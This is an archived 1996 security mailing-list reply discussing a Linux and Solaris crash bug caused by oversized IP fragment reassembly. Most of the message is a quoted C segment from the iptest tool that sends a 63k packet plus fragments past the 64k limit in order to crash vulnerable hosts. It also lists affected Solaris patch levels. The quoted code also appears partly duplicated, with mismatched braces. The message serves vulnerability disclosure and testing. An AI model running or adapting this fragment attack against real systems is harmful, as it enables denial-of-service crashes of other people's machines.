Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST) From: Darren Reed <avalon@coombs.anu.edu.au> To: lutz@muc.de (Lutz Albers) Cc: security@freebsd.org Subject: Re: [bugtraq] Serious Linux Security Bug Message-ID: <199610221338.GAA28820@freefall.freebsd.org> In-Reply-To: <v03007802ae925cb8a72c@[192.168.42.51]> from "Lutz Albers" at Oct 22, 96 01:15:53 pm
next in thread | previous in thread | raw e-mail | index | archive | help
Solaris2 was, I believe, vulnerable to this bug too.
>From the "Crashable" file for iptest:
Solaris 2.4 - upto and including 101945-34, > 34 ?
Solaris 2.5 - 11/95
For those with it handly, "iptest -1 -p 8".
but I built in some random lossage which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course), is at max. 64k in size.
However, it doesn't try to send an ICMP packet, the following segment of
code is what triggeres it:
if (!ptest || (ptest == 8)) {
struct timeval tv;
gettimeofday(&tv, NULL);
srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
/*
* Part8: 63k packet + 1k fragment at offset 0x1ffe
*/
ip->ip_off = IP_MF;
u->uh_dport = htons(9);
ip->ip_id = htons(id++);
printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
ip->ip_len = 768 + 20 + 8;
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip 0\n");
ip->ip_len = MIN(768 + 20, mtu - 68);
i = 512;
for (; i < (63 * 1024 + 768); i += 768) {
ip->ip_off = IP_MF | (i >> 3);
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip\n");
putchar('\n');
fflush(stdout);
}
Don't work against any system using a BSD based IP networking code.
Darren
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199610221338.GAA28820>